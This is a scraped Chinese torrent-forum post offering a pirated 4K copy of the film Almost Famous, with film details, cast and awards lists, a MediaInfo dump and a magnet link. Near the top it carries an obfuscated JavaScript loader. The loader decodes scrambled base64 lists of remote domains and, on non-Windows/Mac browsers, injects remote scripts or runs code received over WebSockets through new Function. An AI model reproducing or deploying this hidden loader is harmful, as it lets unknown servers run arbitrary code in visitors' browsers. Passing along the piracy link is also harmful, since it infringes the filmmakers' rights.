几近成名[中文字幕]Almost.Famous.2000.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-迅雷下载 20.87GB

版主小s 9天前 150

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 几近成名 / 成名在望(台) / 不日成名(港) / 成名之路
◎片  名 Almost Famous
◎年  代 2000
◎产  地 美国
◎类  别 剧情 / 音乐
◎语  言 英语
◎上映日期 2000-09-13(美国)
◎IMDb链接 https://www.imdb.com/title/tt0181875/
◎豆瓣评分 8.0/10 (26476人评价)
◎豆瓣链接 https://movie.douban.com/subject/1292352/
◎片  长 122分钟
◎导  演 卡梅伦·克罗 Cameron Crowe (id:1010607)
◎编  剧 卡梅伦·克罗 Cameron Crowe (id:1010607)
◎演  员 比利·克鲁德普 Billy Crudup (id:1009265)
       弗兰西斯·麦克多蒙德 Frances McDormand (id:1010548)
       凯特·哈德森 Kate Hudson (id:1035673)
       杰森·李 Jason Lee (id:1044714)
       派屈克·福吉特 Patrick Fugit (id:1040565)
       佐伊·丹斯切尔 Zooey Deschanel (id:1013758)
       迈克尔·安格拉诺 Michael Angarano (id:1036323)
       安娜·帕奎因 Anna Paquin (id:1012515)
       费尔鲁扎·鲍克 Fairuza Balk (id:1019026)
       诺亚·泰勒 Noah Taylor (id:1049775)
       马克·科兹莱克 Mark Kozelek (id:1005431)
       菲利普·塞默·霍夫曼 Philip Seymour Hoffman (id:1054394)
       利兹·斯托贝尔 Liz Stauber (id:1055424)
       吉米·法伦 Jimmy Fallon (id:1049664)
       碧悠·菲利浦斯 Bijou Phillips (id:1000089)
       J·J·科恩 J.J. Cohen (id:1072284)
       马克·佩灵顿 Mark Pellington (id:1032358)
       艾恩·贝利 Eion Bailey (id:1018039)
       雷恩·威尔森 Rainn Wilson (id:1004593)
       Erin Foley Erin Foley (id:1080638)
       宝蕾·佩雷特 Pauley Perrette (id:1000044)
       扎克·沃德 Zack Ward (id:1049741)
       约翰·帕特里克·阿梅多利 John Patrick Amedori (id:1000156)
       威廉·麦鲍瑟 William Mapother (id:1000165)
       马克·马龙 Marc Maron (id:1116943)
       Eric Rosenberg Eric Rosenberg (id:1296067)
       查尔斯·沃克 Charles Walker (id:1300292)
       艾瑞克·斯通斯崔特 Eric Stonestreet (id:1049652)
       特瑞·陈 Terry Chen (id:1004684)
       杰伊·巴鲁切尔 Jay Baruchel (id:1002664)
       凯文·苏斯曼 Kevin Sussman (id:1036570)
       Marty P. Ewing Marty P. Ewing (id:1283370)
       史蒂文·P·塞塔 Steven P. Saeta (id:1276330)
       伊安·布莱斯 Ian Bryce (id:1279526)
       Scott M. Martin Scott M. Martin (id:1291140)
       南希·威尔逊 Nancy Wilson (id:1161587)
       马克·科兹莱克 Mark Kozelek (id:1005431)
       约翰·托尔 John Toll (id:1276189)
       乔·哈欣 Joe Hutshing (id:1287228)
       萨尔·克莱恩 Saar Klein (id:1288699)
       Clay A. Griffith Clay A. Griffith (id:1285467)
       Robert Greenfield Robert Greenfield (id:1285401)
       Virginia L. Randolph Virginia L. Randolph (id:1295219)
       克莱顿·哈特利 Clayton Hartley (id:1286164)
       贝奇·海曼 Betsy Heimann (id:1286361)
       迈克尔·杰曼 Michael Germain (id:1284741)
       洛伊斯·布尔维尔 Lois Burwell (id:1276653)
       艾米·林恩 Amy Lynn (id:1290539)
       Eric Yellin Eric Yellin (id:1276265)
       约翰·德斯贾尔丁 John 'D.J.' Des Jardin (id:1282276)
       罗布·霍奇森 Rob Hodgson (id:1286743)
       乔纳森·F·斯泰尔朗德 Jonathan F. Styrlund (id:1298589)
       埃德·琼斯 Ed Jones (id:1287861)
       John E. Sasaki John E. Sasaki (id:1296724)
       马克·弗伦德 Mark Freund (id:1284190)

◎标  签 摇滚 / 美国 / 音乐 / 青春 / 成长 / 美国电影 / 剧情 / 2000

◎简  介
  优秀生威廉(派屈克·福吉特 Patrick Fugit饰)在毕业前争取到为《滚石杂志》写采访稿的机会。他要跟随摇滚乐队的行程,进行一次长途的旅行和报道。妈妈担心摇滚乐队的不良作风,坚决反对威廉的决定。                                    
                                威廉还是固执地上路了。他的采访对象是“Stillwater”乐队的成员,这群年轻人还没有成名,心中怀揣着梦想前往全国各地开演唱会。他们有着很多其他摇滚歌手具有的特质:放纵、呐喊、喜怒无常,现场煽动着观众的尖叫。同时,他们会沉溺与毒品,有着人性中自私、猜妒的种种弱点。有一个叫潘妮(凯特·哈德森 Kate Hudson饰)的乐迷,与乐队共进退,最后却选择了离开。威廉用心去感受并参与这一切,从中获得宝贵的阅历。

◎获奖情况 (共14项)
  第73届奥斯卡金像奖 (2001)
  最佳女配角(提名)
   └──弗兰西斯·麦克多蒙德 (id:1010548)
   └──凯特·哈德森 (id:1035673)
  最佳原创剧本
   └──卡梅伦·克罗 (id:1010607)
  最佳剪辑(提名)
   └──乔·哈欣 (id:1287228)
   └──萨尔·克莱恩 (id:1288699)

  第58届金球奖 (2001)
  电影类 最佳音乐/喜剧片
  电影类 最佳女配角
   └──凯特·哈德森 (id:1035673)
  电影类 最佳女配角(提名)
   └──弗兰西斯·麦克多蒙德 (id:1010548)
  电影类 最佳编剧(提名)
   └──卡梅伦·克罗 (id:1010607)

  第54届英国电影学院奖 (2001)
  电影奖 最佳影片(提名)
   └──伊安·布莱斯 (id:1279526)
   └──卡梅伦·克罗 (id:1010607)
  电影奖 最佳女主角(提名)
   └──凯特·哈德森 (id:1035673)
  电影奖 最佳女配角(提名)
   └──弗兰西斯·麦克多蒙德 (id:1010548)
  电影奖 最佳原创剧本
   └──卡梅伦·克罗 (id:1010607)
  电影奖 最佳原创音乐(提名)
   └──南希·威尔逊 (id:1161587)
  电影奖 最佳音效
   └──保罗·马瑟 (id:1124315)
   └──迈克尔·D·威尔霍伊特 (id:1300921)
   └──道格·亨普希尔 (id:1286418)
   └──杰夫·维克斯勒 (id:1300763)
   └──里克·克莱恩 (id:1288718)

  第1届美国电影学会奖 (2000)
  年度佳片

  1. General
  2. Unique ID                                : 61213600722896168669053060660007579872 (0x2E0D4F87A64DB5E2B31E2E5BF8A0B0E0)
  3. Complete name                            : Almost.[email protected]BBQDDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 20.9 GiB
  7. Duration                                 : 2 h 41 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 18.5 Mb/s
  10. Movie name                               : Almost Famous 2000 2160p HDR UHD BluRay DTS-HD MA 5.1 [email protected]
  11. Encoded date                             : UTC 2021-07-17 23:42:46
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. HDR format                               : SMPTE ST 2086, HDR10 compatible
  20. Codec ID                                 : V_MPEGH/ISO/HEVC
  21. Duration                                 : 2 h 41 min
  22. Bit rate                                 : 16.2 Mb/s
  23. Width                                    : 3 840 pixels
  24. Height                                   : 2 072 pixels
  25. Display aspect ratio                     : 1.85:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 10 bits
  31. Bits/(Pixel*Frame)                       : 0.085
  32. Stream size                              : 18.3 GiB (88%)
  33. Title                                    : @HDSky
  34. Writing library                          : x265 - H.265/HEVC codec
  35. Default                                  : Yes
  36. Forced                                   : No
  37. Color range                              : Limited
  38. Color primaries                          : BT.2020
  39. Transfer characteristics                 : PQ
  40. Matrix coefficients                      : BT.2020 non-constant
  41. Mastering display color primaries        : Display P3
  42. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2
  43. Maximum Content Light Level              : 739 cd/m2
  44. Maximum Frame-Average Light Level        : 331 cd/m2
  45. Audio
  46. ID                                       : 2
  47. Format                                   : DTS XLL
  48. Format/Info                              : Digital Theater Systems
  49. Commercial name                          : DTS-HD Master Audio
  50. Codec ID                                 : A_DTS
  51. Duration                                 : 2 h 41 min
  52. Bit rate mode                            : Variable
  53. Bit rate                                 : 2 268 kb/s
  54. Channel(s)                               : 6 channels
  55. Channel layout                           : C L R Ls Rs LFE
  56. Sampling rate                            : 48.0 kHz
  57. Frame rate                               : 93.750 FPS (512 SPF)
  58. Bit depth                                : 16 bits
  59. Compression mode                         : Lossless
  60. Stream size                              : 2.56 GiB (12%)
  61. Title                                    : English
  62. Language                                 : English
  63. Default                                  : Yes
  64. Forced                                   : No
  65. Text #1
  66. ID                                       : 3
  67. Format                                   : PGS
  68. Muxing mode                              : zlib
  69. Codec ID                                 : S_HDMV/PGS
  70. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  71. Duration                                 : 2 h 32 min
  72. Bit rate                                 : 34.5 kb/s
  73. Count of elements                        : 3870
  74. Stream size                              : 37.6 MiB (0%)
  75. Title                                    : ENG
  76. Language                                 : English
  77. Default                                  : Yes
  78. Forced                                   : No
  79. Text #2
  80. ID                                       : 4
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 2 h 34 min
  86. Bit rate                                 : 30.6 kb/s
  87. Count of elements                        : 3966
  88. Stream size                              : 33.9 MiB (0%)
  89. Title                                    : CHT
  90. Language                                 : Chinese
  91. Default                                  : No
  92. Forced                                   : No
  93. Menu
  94. 00:00:00.000                             : en:Chapter 01
  95. 00:08:03.525                             : en:Chapter 02
  96. 00:18:36.240                             : en:Chapter 03
  97. 00:27:00.911                             : en:Chapter 04
  98. 00:36:20.804                             : en:Chapter 05
  99. 00:48:25.694                             : en:Chapter 06
  100. 00:54:49.411                             : en:Chapter 07
  101. 01:07:28.962                             : en:Chapter 08
  102. 01:17:32.231                             : en:Chapter 09
  103. 01:28:07.782                             : en:Chapter 10
  104. 01:35:51.412                             : en:Chapter 11
  105. 01:46:28.340                             : en:Chapter 12
  106. 01:54:53.804                             : en:Chapter 13
  107. 02:08:26.198                             : en:Chapter 14
  108. 02:16:33.811                             : en:Chapter 15
  109. 02:29:25.331                             : en:Chapter 16


TAGS 剧情 音乐

磁力链:
  • magnet:?xt=urn:btih:D41E416F0C64D236C2F9352BCDA85E95513C31BE
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回